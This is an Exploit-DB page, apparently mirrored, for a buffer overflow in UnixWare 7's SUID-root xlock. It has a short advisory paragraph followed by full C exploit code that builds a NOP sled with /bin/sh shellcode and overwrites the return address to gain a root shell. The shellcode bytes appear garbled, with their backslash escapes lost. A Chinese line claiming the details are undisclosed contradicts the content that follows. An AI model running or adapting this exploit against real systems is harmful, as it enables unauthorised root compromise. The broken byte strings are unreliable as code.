https://www.exploit-db.com/exploits/19642

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/825/info

Certain versions of Unixware ship with a version of xlock which is vulnerable to a buffer overflow attack. The xlock(1) program locks the local X display until a username and password are entered. In this instance a user can provide an overly long username and overflow a buffer in xlock(1). Given that xlock(1) runs SUID root this will result in a root compromise.

// UnixWare7 /usr/bin/xlock local, K2, revisited Oct-30-1999
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
 "xebx48x9axffxffxffxffx07xffxc3x5ex31xc0x89x46xb4"
 "x88x46xb9x88x46x07x89x46x0cx31xc0x50xb0x8dxe8xdf"
 "xffxffxffx83xc4x04x31xc0x50xb0x17xe8xd2xffxffxff"
 "x83xc4x04x31xc0x50x8dx5ex08x53x8dx1ex89x5ex08x53"
 "xb0x3bxe8xbbxffxffxffx83xc4x0cxe8xbbxffxffxffx2f"
 "x62x69x6ex2fx73x68xffxffxffxffxffxffxffxffxff";

#define SIZE 1200
#define NOPDEF 601
#define DEFOFF -400

const char x86_nop=0x90;
long nop=NOPDEF,esp;
long offset=DEFOFF;
char buffer[SIZE];

long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[])
{
    register int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);
    esp = get_esp();

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    printf("jmp = [0x%x]toffset = [%d]n",esp+offset,offset);
    execl("/usr/X/bin/xlock", "xlock", "-name", buffer, NULL);

    printf("exec failed!n");
    return 0;
}